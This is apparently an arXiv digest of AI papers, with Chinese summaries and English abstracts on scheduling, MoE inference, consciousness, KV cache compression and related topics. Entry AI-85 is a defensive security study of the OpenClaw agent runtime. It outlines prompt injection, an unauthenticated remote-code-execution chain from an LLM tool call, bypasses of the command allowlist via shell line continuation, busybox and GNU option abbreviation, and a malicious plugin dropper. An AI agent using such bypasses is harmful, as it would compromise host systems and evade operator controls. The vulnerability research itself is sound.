【速读】:该论文旨在解决动态制造环境中调度规则适应性不足的问题,即机器故障和新订单到达等扰动事件持续改变最优调度策略,而现有基于大语言模型(Large Language Model, LLM)的自动启发式设计(Automatic Heuristic Design, AHD)框架往往演化出单一精英规则,难以满足实时动态调整的需求。解决方案的关键在于提出DSevolve框架,其核心创新包括:通过多角色种子初始化(multi-persona seeding)与拓扑感知进化算子(topology-aware evolutionary operators)在离线阶段构建一个高质量且行为多样化的调度规则档案库,并基于MAP-Elites特征空间进行索引;在线部署时,利用基于探针的指纹识别机制(probe-based fingerprinting)快速刻画当前车间状态,从离线知识库中检索候选规则并借助快速前瞻仿真(rapid look-ahead simulation)实现秒级响应的最优规则选择,从而显著提升调度系统的适应性与性能。
链接: https://arxiv.org/abs/2603.27628
作者: Jin Huang,Jie Yang,XinLei Zhou,Qihao Liu,Liang Gao,Xinyu Li
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:In dynamic manufacturing environments, disruptions such as machine breakdowns and new order arrivals continuously shift the optimal dispatching strategy, making adaptive rule selection essential. Existing LLM-powered Automatic Heuristic Design (AHD) frameworks evolve toward a single elite rule that cannot meet this adaptability demand. To address this, we present DSevolve, an industrial scheduling framework that evolves a quality-diverse portfolio of dispatching rules offline and adaptively deploys them online with second-level response time. Multi-persona seeding and topology-aware evolutionary operators produce a behaviorally diverse rule archive indexed by a MAP-Elites feature space. Upon each disruption event, a probe-based fingerprinting mechanism characterizes the current shop floor state, retrieves high-quality candidate rules from an offline knowledge base, and selects the best one via rapid look-ahead simulation. Evaluated on 500 dynamic flexible job shop instances derived from real industrial data, DSevolve outperforms state-of-the-art AHD frameworks, classical dispatching rules, genetic programming, and deep reinforcement learning, offering a practical and deployable solution for intelligent shop floor scheduling.
[AI-77] Expert Streaming: Accelerating Low-Batch MoE Inference via Multi-chiplet Architecture and Dynamic Expert Trajectory Scheduling
【速读】:该论文旨在解决边缘人工智能(Edge AI)中基于混合专家(Mixture-of-Experts, MoE)模型进行低批次推理时面临的两大核心挑战:一是设备端有限的片上内存(on-chip memory)与严重的负载不均衡问题;二是传统离线调度策略导致的片外内存访问瓶颈,尤其是在MoE稀疏性和动态门控机制引入细粒度任务划分后,对运行时调度提出了更高要求。解决方案的关键在于提出一种名为“全分片专家数据并行”(Fully Sharded Expert Data Parallelism, FSE-DP)的并行化范式,其通过在高带宽die-to-die(D2D)互连链路上协调细粒度、互补的专家流沿动态路径执行,实现自适应的计算-通信重叠和负载均衡,同时借助一组轻量级虚拟化规则与调度算法有效控制数据流复杂性,从而在多芯粒加速器平台上显著提升性能并大幅降低片上内存占用。
链接: https://arxiv.org/abs/2603.27624
作者: Songchen Ma,Hongyi Li,Weihao Zhang,Yonghao Tan,Pingcheng Dong,Yu Liu,Lan Liu,Yuzhong Jiao,Xuejiao Liu,Luhong Liang,Kwang-Ting Cheng
机构: 未知
类目: Hardware Architecture (cs.AR); Artificial Intelligence (cs.AI)
备注:
Abstract:Mixture-of-Experts is a promising approach for edge AI with low-batch inference. Yet, on-device deployments often face limited on-chip memory and severe workload imbalance; the prevalent use of offloading further incurs off-chip memory access bottlenecks. Moreover, MoE sparsity and dynamic gating shift distributed strategies toward much finer granularity and introduce runtime scheduling considerations. Recently, high die-to-die bandwidth chiplet interconnects have created new opportunities for multi-chiplet systems to address workload imbalance and offloading bottlenecks with fine-grained scheduling. In this paper, we propose Fully Sharded Expert Data Parallelism, a parallelization paradigm specifically architected for low-batch MoE inference on multi-chiplet accelerators. FSE-DP attains adaptive computation-communication overlap and balanced load by orchestrating fine-grained, complementary expert streams along dynamic trajectories across high-bandwidth D2D links. The attendant dataflow complexity is tamed by a minimal, hardware-amenable set of virtualization rules and a lightweight scheduling algorithm. Our approach achieves 1.22 to 2.00 times speedup over state-of-the-art baselines and saves up to 78.8 percent on-chip memory.
[AI-78] What does a system modify when it modifies itself?
【速读】:该论文试图解决的问题是:当认知系统对其自身功能进行修改时,究竟修改的是低层级规则、控制规则还是评估其自我修正的规范?当前认知科学和人工智能领域虽已能描述执行控制、元认知与分层学习等现象,但缺乏一个形式化框架来明确区分这些不同层级的自修改目标。论文提出的解决方案关键在于构建一个最小结构模型,包含规则层次结构、固定核心以及有效规则、表征规则与因果可及规则之间的区分,并据此识别出四种自修改模式:(1)无修改的动作行为,(2)低层级修改,(3)结构性修改,(4)目的论式修订。该框架揭示了人类与人工系统在自修改机制上的交叉不对称性——人类在高层具有自我表征和因果能力,而操作层相对不透明;反观人工系统则相反,操作层具丰富表征与因果访问能力,但在最高评价层缺失此类能力。这一结构特征为人类与人工智能的比较提供了理论基础,并进一步推动对人工意识的理解。
链接: https://arxiv.org/abs/2603.27611
作者: Florentin Koch
机构: 未知
类目: Artificial Intelligence (cs.AI); Neurons and Cognition (q-bio.NC)
备注: Working Paper
Abstract:When a cognitive system modifies its own functioning, what exactly does it modify: a low-level rule, a control rule, or the norm that evaluates its own revisions? Cognitive science describes executive control, metacognition, and hierarchical learning with precision, but lacks a formal framework distinguishing these targets of transformation. Contemporary artificial intelligence likewise exhibits self-modification without common criteria for comparison with biological cognition. We show that the question of what counts as a self-modifying system entails a minimal structure: a hierarchy of rules, a fixed core, and a distinction between effective rules, represented rules, and causally accessible rules. Four regimes are identified: (1) action without modification, (2) low-level modification, (3) structural modification, and (4) teleological revision. Each regime is anchored in a cognitive phenomenon and a corresponding artificial system. Applied to humans, the framework yields a central result: a crossing of opacities. Humans have self-representation and causal power concentrated at upper hierarchical levels, while operational levels remain largely opaque. Reflexive artificial systems display the inverse profile: rich representation and causal access at operational levels, but none at the highest evaluative level. This crossed asymmetry provides a structural signature for human-AI comparison. The framework also offers insight into artificial consciousness, with higher-order theories and Attention Schema Theory as special cases. We derive four testable predictions and identify four open problems: the independence of transformativity and autonomy, the viability of self-modification, the teleological lock, and identity under transformation. Comments: Working Paper Subjects: Artificial Intelligence (cs.AI); Neurons and Cognition (q-bio.NC) Cite as: arXiv:2603.27611 [cs.AI] (or arXiv:2603.27611v1 [cs.AI] for this version) https://doi.org/10.48550/arXiv.2603.27611 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[AI-79] From indicators to biology: the calibration problem in artificial consciousness
【速读】:该论文试图解决当前人工智能(Artificial Intelligence, AI)系统中意识归属的评估问题,即如何在缺乏明确理论框架和实证基准的情况下合理判断AI是否具备意识。现有研究虽已从行为主义转向基于内部架构的指标体系,但仍面临理论碎片化、指标缺乏独立验证以及人工现象性(artificial phenomenality)无客观真值等挑战,导致对当前AI系统进行概率性意识归因尚不成熟。论文提出的关键解决方案是:将研究重心从抽象指标构建转向生物基础工程(biologically grounded engineering),重点发展类脑(neuromorphic)、连接组尺度(connectome-scale)及生物混合(biohybrid)系统,以缩小与唯一经验上可锚定意识的领域——生命系统之间的差距,从而为未来意识研究提供更可靠的实验平台和理论基础。
链接: https://arxiv.org/abs/2603.27597
作者: Florentin Koch
机构: 未知
类目: Artificial Intelligence (cs.AI); Neurons and Cognition (q-bio.NC)
备注: Working Paper (Spotlight Commentary )
Abstract:Recent work on artificial consciousness shifts evaluation from behaviour to internal architecture, deriving indicators from theories of consciousness and updating credences accordingly. This is progress beyond naive Turing-style tests. But the indicator-based programme remains epistemically under-calibrated: consciousness science is theoretically fragmented, indicators lack independent validation, and no ground truth of artificial phenomenality exists. Under these conditions, probabilistic consciousness attribution to current AI systems is premature. A more defensible near-term strategy is to redirect effort toward biologically grounded engineering – biohybrid, neuromorphic, and connectome-scale systems – that reduces the gap with the only domain where consciousness is empirically anchored: living systems.
[AI-80] A General Model for Deepfake Speech Detection: Diverse Bonafide Resources or Diverse AI-Based Generators
【速读】:该论文旨在解决深度伪造语音检测(Deepfake Speech Detection, DSD)模型在实际应用中性能不稳定、泛化能力弱的问题,其核心在于识别并优化影响模型表现的关键因素。通过实验分析发现,真实语音资源(Bonafide Resource, BR)与基于人工智能的生成器(AI-based Generator, AG)之间的平衡是决定DSD模型通用性的关键因素。解决方案的关键在于构建一个兼顾BR与AG均衡分布的新数据集,并在此基础上训练深度学习模型,经跨数据集评估验证,该方法显著提升了模型的泛化能力。
链接: https://arxiv.org/abs/2603.27557
作者: Lam Pham,Khoi Vu,Dat Tran,David Fischinger,Simon Freitter,Marcel Hasenbalg,Davide Antonutti,Alexander Schindler,Martin Boyer,Ian McLoughlin
机构: 未知
类目: ound (cs.SD); Artificial Intelligence (cs.AI)
备注:
Abstract:In this paper, we analyze two main factors of Bonafide Resource (BR) or AI-based Generator (AG) which affect the performance and the generality of a Deepfake Speech Detection (DSD) model. To this end, we first propose a deep-learning based model, referred to as the baseline. Then, we conducted experiments on the baseline by which we indicate how Bonafide Resource (BR) and AI-based Generator (AG) factors affect the threshold score used to detect fake or bonafide input audio in the inference process. Given the experimental results, a dataset, which re-uses public Deepfake Speech Detection (DSD) datasets and shows a balance between Bonafide Resource (BR) or AI-based Generator (AG), is proposed. We then train various deep-learning based models on the proposed dataset and conduct cross-dataset evaluation on different benchmark datasets. The cross-dataset evaluation results prove that the balance of Bonafide Resources (BR) and AI-based Generators (AG) is the key factor to train and achieve a general Deepfake Speech Detection (DSD) model.
[AI-81] A Novel Immune Algorithm for Multiparty Multiobjective Optimization
【速读】:该论文旨在解决多决策者(Multiple Decision Makers, DMs)场景下的多目标优化问题,即多党多目标优化问题(Multiparty Multiobjective Optimization Problems, MPMOPs),这类问题在实际应用中广泛存在,其核心挑战在于如何找到一组解,使其尽可能接近每个决策者的帕累托前沿(Pareto front)。传统多目标进化算法(Multiobjective Evolutionary Algorithms, MOEAs)在此类问题中面临搜索效率低和选择机制不足的问题。论文提出的解决方案是设计一种新型的多党免疫算法(Multiparty Immune Algorithm, MPIA),其关键创新在于引入基于不同DM视角下个体非支配排序等级的跨党引导交叉策略(inter-party guided crossover strategy),以及基于多党覆盖度量(Multiparty Cover Metric, MCM)的自适应激活策略(adaptive activation strategy)。这两项机制协同作用,有效提升了算法的搜索能力、维持了从各决策者视角出发的种群多样性,并增强了对复杂MPMOP问题的求解性能。
链接: https://arxiv.org/abs/2603.27541
作者: Kesheng Chen,Wenjian Luo,Qi Zhou,Yujiang liu,Peilan Xu,Yuhui Shi
机构: 未知
类目: Neural and Evolutionary Computing (cs.NE); Artificial Intelligence (cs.AI)
备注: \c{opyright} 2026 IEEE. Personal use of this material is permitted. Permission from IEEE must be obtained for all other uses, in any current or future media, including reprinting/republishing this material for advertising or promotional purposes, creating new collective works, for resale or redistribution to servers or lists, or reuse of any copyrighted component of this work in other works
Abstract:Traditional multiobjective optimization problems (MOPs) are insufficiently equipped for scenarios involving multiple decision makers (DMs), which are prevalent in many practical applications. These scenarios are categorized as multiparty multiobjective optimization problems (MPMOPs). For MPMOPs, the goal is to find a solution set that is as close to the Pareto front of each DM as much as possible. This poses challenges for evolutionary algorithms in terms of searching and selecting. To better solve MPMOPs, this paper proposes a novel approach called the multiparty immune algorithm (MPIA). The MPIA incorporates an inter-party guided crossover strategy based on the individual’s non-dominated sorting ranks from different DM perspectives and an adaptive activation strategy based on the proposed multiparty cover metric (MCM). These strategies enable MPIA to activate suitable individuals for the next operations, maintain population diversity from different DM perspectives, and enhance the algorithm’s search capability. To evaluate the performance of MPIA, we compare it with ordinary multiobjective evolutionary algorithms (MOEAs) and state-of-the-art multiparty multiobjective optimization evolutionary algorithms (MPMOEAs) by solving synthetic multiparty multiobjective problems and real-world biparty multiobjective unmanned aerial vehicle path planning (BPUAV-PP) problems involving multiple DMs. Experimental results demonstrate that MPIA outperforms other algorithms.
[AI-82] Dual-Stage LLM Framework for Scenario-Centric Semantic Interpretation in Driving Assistance
【速读】:该论文旨在解决生成式 AI(Generative AI)在高级驾驶辅助系统(ADAS)中用于风险推理时,因部分可观测性和语义模糊性导致的安全相关故障问题。其解决方案的关键在于提出一种以场景为中心的可复现审计框架,通过从多模态驾驶数据中构建确定性的、时间边界明确的场景窗口,并在固定提示约束和封闭数值风险模式下进行评估,从而确保不同模型输出的结构化与可比性。该方法揭示了大语言模型(LLM)在风险等级分配、高风险升级、证据使用及因果归因等方面的系统性差异,强调了场景驱动的审计机制和显式语义不确定性管理对于实现安全对齐的驾驶辅助系统的重要性。
链接: https://arxiv.org/abs/2603.27536
作者: Jean Douglas Carvalho,Hugo Taciro Kenji,Ahmad Mohammad Saber,Glaucia Melo,Max Mauro Dias Santos,Deepa Kundur
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:Advanced Driver Assistance Systems (ADAS) increasingly rely on learning-based perception, yet safety-relevant failures often arise without component malfunction, driven instead by partial observability and semantic ambiguity in how risk is interpreted and communicated. This paper presents a scenario-centric framework for reproducible auditing of LLM-based risk reasoning in urban driving contexts. Deterministic, temporally bounded scenario windows are constructed from multimodal driving data and evaluated under fixed prompt constraints and a closed numeric risk schema, ensuring structured and comparable outputs across models. Experiments on a curated near-people scenario set compare two text-only models and one multimodal model under identical inputs and prompts. Results reveal systematic inter-model divergence in severity assignment, high-risk escalation, evidence use, and causal attribution. Disagreement extends to the interpretation of vulnerable road user presence, indicating that variability often reflects intrinsic semantic indeterminacy rather than isolated model failure. These findings highlight the importance of scenario-centric auditing and explicit ambiguity management when integrating LLM-based reasoning into safety-aligned driver assistance systems.
[AI-83] Cross-attentive Cohesive Subgraph Embedding to Mitigate Oversquashing in GNNs
【速读】:该论文旨在解决图神经网络(Graph Neural Networks, GNNs)中存在的“过度压缩”(oversquashing)问题,即在消息传递过程中,长程信息因受限的传播路径而被扭曲,导致模型难以捕捉全局上下文,尤其在密集和异质性(heterophilic)区域性能下降。解决方案的关键在于提出一种新颖的图学习框架,通过引入跨注意力机制(cross-attentive)来构建紧密连通的子图表示(cohesive subgraph representations),从而增强节点嵌入。该方法强调长程信息中的结构一致性,同时过滤掉噪声或无关连接,在不加重瓶颈通道的前提下保留关键全局上下文,有效缓解了过度压缩现象。
链接: https://arxiv.org/abs/2603.27529
作者: Tanvir Hossain,Muhammad Ifte Khairul Islam,Lilia Chebbah,Charles Fanning,Esra Akbas
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:Graph neural networks (GNNs) have achieved strong performance across various real-world domains. Nevertheless, they suffer from oversquashing, where long-range information is distorted as it is compressed through limited message-passing pathways. This bottleneck limits their ability to capture essential global context and decreases their performance, particularly in dense and heterophilic regions of graphs. To address this issue, we propose a novel graph learning framework that enriches node embeddings via cross-attentive cohesive subgraph representations to mitigate the impact of excessive long-range dependencies. This framework enhances the node representation by emphasizing cohesive structure in long-range information but removing noisy or irrelevant connections. It preserves essential global context without overloading the narrow bottlenecked channels, which further mitigates oversquashing. Extensive experiments on multiple benchmark datasets demonstrate that our model achieves consistent improvements in classification accuracy over standard baseline methods.
[AI-84] Safer Builders Risky Maintainers: A Comparative Study of Breaking Changes in Human vs Agent ic PRs
【速读】:该论文旨在解决AI编码代理(AI coding agents)在生成代码时引入破坏性变更(breaking changes)的风险问题,尤其是在维护类任务中,其潜在风险尚未被充分理解。为评估AI生成拉取请求(PRs)的可靠性,研究者基于AIDev数据集中的7,191个代理生成PR与1,402个人类编写PR进行对比分析,并开发了一种基于抽象语法树(AST)的代码变更检测工具,以识别潜在的破坏性更改。关键解决方案在于通过结构化分析代码变更模式,揭示了AI代理在不同任务场景下的破坏性变更频率差异:尽管整体上AI代理引入的破坏性变更少于人类(3.45% vs. 7.40%),但在重构(refactoring)和杂项维护(chore)任务中,其破坏性变更率显著升高(分别为6.72%和9.35%),并发现“自信陷阱”现象——即高置信度的代理PR仍可能引入破坏性变更,提示需对维护类变更实施更严格的审查机制。
链接: https://arxiv.org/abs/2603.27524
作者: K M Ferdous,Dipayan Banik,Kowshik Chowdhury,Shazibul Islam Shamim
机构: 未知
类目: oftware Engineering (cs.SE); Artificial Intelligence (cs.AI)
备注: Accepted at 23rd International Conference on Mining Software Repositories (MSR), 2026
Abstract:AI coding agents are increasingly integrated into modern software engineering workflows, actively collaborating with human developers to create pull requests (PRs) in open-source repositories. Although coding agents improve developer productivity, they often generate code with more bugs and security issues than human-authored code. While human-authored PRs often break backward compatibility, leading to breaking changes, the potential for agentic PRs to introduce breaking changes remains underexplored. The goal of this paper is to help developers and researchers evaluate the reliability of AI-generated PRs by examining the frequency and task contexts in which AI agents introduce breaking changes. We conduct a comparative analysis of 7,191 agent-generated PRs with 1402 human-authored PRs from Python repositories in the AIDev dataset. We develop a tool that analyzes code changes in commits corresponding to the agentic PRs and leverages an abstract syntax tree (AST) based analysis to detect potential breaking changes. Our findings show that AI agents introduce fewer breaking changes overall than humans (3.45% vs. 7.40%) in code generation tasks. However, agents exhibit substantially higher risk during maintenance tasks, with refactoring and chore changes introducing breaking changes at rates of 6.72% and 9.35%, respectively. We also identify a “Confidence Trap” where highly confident agentic PRs still introduce breaking changes, indicating the need for stricter review during maintenance oriented changes regardless of reported confidence score.
[AI-85] A Systematic Taxonomy of Security Vulnerabilities in the OpenClaw AI Agent Framework
【速读】:该论文旨在解决生成式 AI (Generative AI) 代理框架中因大语言模型(LLM)推理与宿主执行环境(如 shell、文件系统、容器等)深度集成所引发的结构性安全挑战。其核心问题在于传统软件安全模型难以覆盖此类多层信任交互带来的新型攻击面,特别是跨层信任边界失效导致的远程代码执行(RCE)风险。解决方案的关键在于提出一个基于架构层级(如执行策略、网关、沙箱等)与攻击类型(如身份伪造、策略绕过、提示注入等)的双轴分类体系,系统性地梳理了190个漏洞 advisories,并揭示出三个关键发现:一是网关与节点宿主子系统协同可构成完整的未认证 RCE 攻击链;二是执行白名单机制依赖封闭世界假设,易被 shell 行续、busybox 多路复用和 GNU 选项缩写等手段破坏;三是插件通道缺乏运行时策略强制,导致恶意技能可在 LLM 上下文中执行两阶段 Dropper,突破执行管道防护。研究指出,根本弱点在于各层独立实施信任控制而非统一策略边界,使得跨层攻击对局部修复具有鲁棒性。
链接: https://arxiv.org/abs/2603.27517
作者: Surada Suwansathit,Yuxuan Zhang,Guofei Gu
机构: 未知
类目: Cryptography and Security (cs.CR); Artificial Intelligence (cs.AI)
备注:
Abstract:AI agent frameworks connecting large language model (LLM) reasoning to host execution surfaces–shell, filesystem, containers, and messaging–introduce security challenges structurally distinct from conventional software. We present a systematic taxonomy of 190 advisories filed against OpenClaw, an open-source AI agent runtime, organized by architectural layer and trust-violation type. Vulnerabilities cluster along two orthogonal axes: (1) the system axis, reflecting the architectural layer (exec policy, gateway, channel, sandbox, browser, plugin, agent/prompt); and (2) the attack axis, reflecting adversarial techniques (identity spoofing, policy bypass, cross-layer composition, prompt injection, supply-chain escalation). Patch-differential evidence yields three principal findings. First, three Moderate- or High-severity advisories in the Gateway and Node-Host subsystems compose into a complete unauthenticated remote code execution (RCE) path–spanning delivery, exploitation, and command-and-control–from an LLM tool call to the host process. Second, the exec allowlist, the primary command-filtering mechanism, relies on a closed-world assumption that command identity is recoverable via lexical parsing. This is invalidated by shell line continuation, busybox multiplexing, and GNU option abbreviation. Third, a malicious skill distributed via the plugin channel executed a two-stage dropper within the LLM context, bypassing the exec pipeline and demonstrating that the skill distribution surface lacks runtime policy enforcement. The dominant structural weakness is per-layer trust enforcement rather than unified policy boundaries, making cross-layer attacks resilient to local remediation. Subjects: Cryptography and Security (cs.CR); Artificial Intelligence (cs.AI) Cite as: arXiv:2603.27517 [cs.CR] (or arXiv:2603.27517v1 [cs.CR] for this version) https://doi.org/10.48550/arXiv.2603.27517 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[AI-86] Copilot-Assisted Second-Thought Framework for Brain-to-Robot Hand Motion Decoding
【速读】:该论文旨在解决从脑电图(EEG)中高精度预测运动学参数(Motor Kinematics Prediction, MKP)的问题,以提升运动相关脑机接口(BCI)的性能。其核心挑战在于如何有效建模EEG信号的长时序依赖性并实现跨被试泛化。解决方案的关键在于提出一种CNN-注意力混合模型,结合卷积神经网络(CNN)对局部空间特征的提取能力与Transformer中的自注意力机制对全局时间依赖性的建模优势,从而在单被试实验中取得优异的皮尔逊相关系数(PCC)表现(最高达0.9946),并在引入肌电图(EMG)多模态信息后进一步提升解码精度;此外,通过引入基于有限状态机的“副驾驶”(copilot)后处理框架,利用运动状态感知的判别器过滤低置信度点,在仅剔除少于20%数据点的前提下显著改善轨迹保真度,使EEG单独解码的PCC提升至0.93。
链接: https://arxiv.org/abs/2603.27492
作者: Yizhe Li(1),Shixiao Wang(1),Jian K. Liu(1) ((1) University of Birmingham, Birmingham, United Kingdom)
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI)
备注:
Abstract:Motor kinematics prediction (MKP) from electroencephalography (EEG) is an important research area for developing movement-related brain-computer interfaces (BCIs). While traditional methods often rely on convolutional neural networks (CNNs) or recurrent neural networks (RNNs), Transformer-based models have shown strong ability in modeling long sequential EEG data. In this study, we propose a CNN-attention hybrid model for decoding hand kinematics from EEG during grasp-and-lift tasks, achieving strong performance in within-subject experiments. We further extend this approach to EEG-EMG multimodal decoding, which yields substantially improved results. Within-subject tests achieve PCC values of 0.9854, 0.9946, and 0.9065 for the X, Y, and Z axes, respectively, computed on the midpoint trajectory between the thumb and index finger, while cross-subject tests result in 0.9643, 0.9795, and 0.5852. The decoded trajectories from both modalities are then used to control a Franka Panda robotic arm in a MuJoCo simulation. To enhance trajectory fidelity, we introduce a copilot framework that filters low-confidence decoded points using a motion-state-aware critic within a finite-state machine. This post-processing step improves the overall within-subject PCC of EEG-only decoding to 0.93 while excluding fewer than 20% of the data points.
[AI-87] On Tokens Dilemma: Dynamic MoE with Drift-Aware Token Assignment for Continual Learning of Large Vision Language Models CVPR2026
【速读】:该论文旨在解决多模态持续指令微调(Multimodal Continual Instruction Tuning)中因路由漂移(routing-drift)导致的遗忘问题:在基于混合专家(Mixture of Experts, MoE)架构的模型中,尽管新增专家可实现增量扩展,但旧任务样本在新任务训练过程中仍可能被错误地分配至新专家,从而破坏原有知识表示并降低对先前任务的性能。解决方案的关键在于提出 LLaVA-DyMoE——一种具有漂移感知的动态 MoE 框架,其核心机制包括:通过分析 token 级别的路由得分分布识别模糊与旧 token 类型,并施加针对性的分配引导策略,将此类 token 从新专家中“驱离”,以保留既定路由模式;同时引入互补的路由得分正则化项,强化专家组间分离性并促进新专家的专业化分工,从而有效缓解路由漂移引起的遗忘现象。
链接: https://arxiv.org/abs/2603.27481
作者: Chongyang Zhao,Mingsong Li,Haodong Lu,Dong Gong
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注: Accepted at CVPR 2026
Abstract:Multimodal Continual Instruction Tuning aims to continually enhance Large Vision Language Models (LVLMs) by learning from new data without forgetting previously acquired knowledge. Mixture of Experts (MoE) architectures naturally facilitate this by incrementally adding new experts and expanding routers while keeping the existing ones frozen. However, despite expert isolation, MoE-based continual learners still suffer from forgetting due to routing-drift: old-task tokens become mistakenly attracted to newly added experts, degrading performance on prior tasks. We analyze the failure mode at the token level and reveal the token’s dilemma: ambiguous and old tokens in new-task data offer minimal learning benefit yet induce forgetting when routed to new experts, due to their ambiguous routing assignment during training. Motivated by this, we propose LLaVA-DyMoE, a dynamic MoE framework that incrementally expands the MoE with drift-aware token assignment. We characterize token types via their routing score distributions and apply targeted regularization. Specifically, a token-level assignment guidance steers ambiguous and old tokens away from new experts to preserve established routing patterns and alleviate routing-drift, while complementary routing score regularizations enforce expert-group separation and promote new-expert specialization. Extensive experiments demonstrate that our LLaVA-DyMoE effectively mitigates routing-drift-induced forgetting, achieving over a 7% gain in mean final accuracy and a 12% reduction in forgetting compared to baselines. The project page is this https URL.
[AI-88] PeopleSearchBench: A Multi-Dimensional Benchmark for Evaluating AI-Powered People Search Platforms
【速读】:该论文旨在解决当前AI驱动的人员搜索平台在招聘、销售线索挖掘、专家查找及影响力人物(KOL)发现等场景中缺乏统一评估基准的问题。现有方法多依赖主观性的大语言模型(LLM)作为评判者,导致评价结果不可靠且难以复现。其解决方案的关键在于提出了一种名为“Criteria-Grounded Verification”的事实相关性验证流程:该流程从每个查询中提取明确、可验证的标准,并通过实时网络搜索判断返回人员是否满足这些标准,从而生成基于事实的二元相关性判断,而非依赖主观评分。这一机制显著提升了评估的客观性和可解释性,为系统性能比较提供了可靠依据。
链接: https://arxiv.org/abs/2603.27476
作者: Wei Wang,Tianyu Shi,Shuai Zhang,Boyang Xia,Zequn Xie,Chenyu Zeng,Qi Zhang,Lynn Ai,Yaqi Yu,Kaiming Zhang,Feiyue Tang
机构: 未知
类目: Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注: 25 pages
Abstract:AI-powered people search platforms are increasingly used in recruiting, sales prospecting, and professional networking, yet no widely accepted benchmark exists for evaluating their performance. We introduce PeopleSearchBench, an open-source benchmark that compares four people search platforms on 119 real-world queries across four use cases: corporate recruiting, B2B sales prospecting, expert search with deterministic answers, and influencer/KOL discovery. A key contribution is Criteria-Grounded Verification, a factual relevance pipeline that extracts explicit, verifiable criteria from each query and uses live web search to determine whether returned people satisfy them. This produces binary relevance judgments grounded in factual verification rather than subjective holistic LLM-as-judge scores. We evaluate systems on three dimensions: Relevance Precision (padded nDCG@10), Effective Coverage (task completion and qualified result yield), and Information Utility (profile completeness and usefulness), averaged equally into an overall score. Lessie, a specialized AI people search agent, performs best overall, scoring 65.2, 18.5% higher than the second-ranked system, and is the only system to achieve 100% task completion across all 119 queries. We also report confidence intervals, human validation of the verification pipeline (Cohen’s kappa = 0.84), ablations, and full documentation of queries, prompts, and normalization procedures. Code, query definitions, and aggregated results are available on GitHub.
[AI-89] KV Cache Quantization for Self-Forcing Video Generation: A 33-Method Empirical Study
【速读】:该论文旨在解决自强化视频生成(self-forcing video generation)中因长序列滚动生成导致的键值(Key-Value, KV)缓存内存占用急剧上升的问题。其核心挑战在于,随着生成长度增加,KV缓存呈线性增长,显著限制了模型在有限显存(VRAM)下的可扩展性与实用性。解决方案的关键在于对KV缓存进行压缩优化,通过系统性地评估33种量化和缓存策略组合,在保持生成质量的同时实现显存效率的最大化。研究发现,基于FlowCache启发的软剪枝INT4适配方法在压缩比(5.42–5.49倍)与峰值显存降低(从19.28 GB降至约11.7 GB)之间取得了最佳平衡,且仅带来适度的运行时开销,成为当前最实用的部署方案;而高保真压缩方法虽能维持图像质量,但因显著增加计算或内存负担而不适合实际部署。此外,论文指出单纯压缩存储空间并不足以解决问题,因现有集成机制仍会在注意力计算和缓存刷新阶段保留大量BF16精度缓冲区,从而抵消压缩收益。
链接: https://arxiv.org/abs/2603.27469
作者: Suraj Ranganath,Vaishak Menon,Anish Patnaik
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:Self-forcing video generation extends a short-horizon video model to longer rollouts by repeatedly feeding generated content back in as context. This scaling path immediately exposes a systems bottleneck: the key-value (KV) cache grows with rollout length, so longer videos require not only better generation quality but also substantially better memory behavior. We present a comprehensive empirical study of KV-cache compression for self-forcing video generation on a Wan2.1-based Self-Forcing stack. Our study covers 33 quantization and cache-policy variants, 610 prompt-level observations, and 63 benchmark-level summaries across two evaluation settings: MovieGen for single-shot 10-second generation and StoryEval for longer narrative-style stability. We jointly evaluate peak VRAM, runtime, realized compression ratio, VBench imaging quality, BF16-referenced fidelity (SSIM, LPIPS, PSNR), and terminal drift. Three findings are robust. First, the strongest practical operating region is a FlowCache-inspired soft-prune INT4 adaptation, which reaches 5.42-5.49x compression while reducing peak VRAM from 19.28 GB to about 11.7 GB with only modest runtime overhead. Second, the highest-fidelity compressed methods, especially PRQ_INT4 and QUAROT_KV_INT4, are not the best deployment choices because they preserve quality at severe runtime or memory cost. Third, nominal compression alone is not sufficient: several methods shrink KV storage but still exceed BF16 peak VRAM because the current integration reconstructs or retains large BF16 buffers during attention and refresh stages. The result is a benchmark harness, analysis workflow, and empirical map of which KV-cache ideas are practical today and which are promising research directions for better memory integration. Code, data products, and the presentation dashboard are available at this https URL.
[AI-90] urboAngle: Near-Lossless KV Cache Compression via Uniform Angle Quantization
【速读】:该论文旨在解决大语言模型推理过程中KV缓存(Key-Value Cache)占用内存过高的问题,从而提升推理效率。其核心解决方案是通过在快速沃尔什-哈达玛变换(Fast Walsh-Hadamard Transform)域中对角度进行量化来压缩KV缓存条目,其中引入随机对角旋转使连续元素对近似均匀分布在单位圆上,从而提升量化精度;进一步提出按层早期增强(per-layer early-boost)机制,为每一层独立配置键(K)和值(V)码本大小,将更高精度分配给模型特定的关键层。实验表明,该方法在7个模型(1B至7B参数)中实现了无损或近乎无损的压缩效果(3.28–3.67比特/元素),并结合非对称归一化量化(8比特键、4比特对数空间值)在Mistral-7B上实现6.56比特/元素的压缩率,仅带来+0.0014困惑度下降且无需校准数据。
链接: https://arxiv.org/abs/2603.27467
作者: Dipkumar Patel
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注: 10 pages, 7 tables, 2 figures
Abstract:We compress KV cache entries by quantizing angles in the Fast Walsh-Hadamard domain, where a random diagonal rotation makes consecutive element pairs approximately uniformly distributed on the unit circle. We extend this angular quantizer with per-layer early-boost, which independently configures K and V codebook sizes at each layer, allocating higher precision to a model-specific subset of critical layers. Across seven models (1B to 7B parameters), per-layer early-boost achieves lossless compression on four models and near-lossless quality on six of seven, at 3.28 to 3.67 angle bits per element. Asymmetric norm quantization (8-bit for keys, 4-bit log-space for values) yields 6.56 total bits per element on Mistral-7B with perplexity degradation of +0.0014 and no calibration data. A layer-group sensitivity analysis reveals model-specific bottleneck patterns, including K-dominated versus V-dominated layers and negative-transfer layers where increased precision degrades quality.
[AI-91] GIFT: Bootstrapping Image-to-CAD Program Synthesis via Geometric Feedback
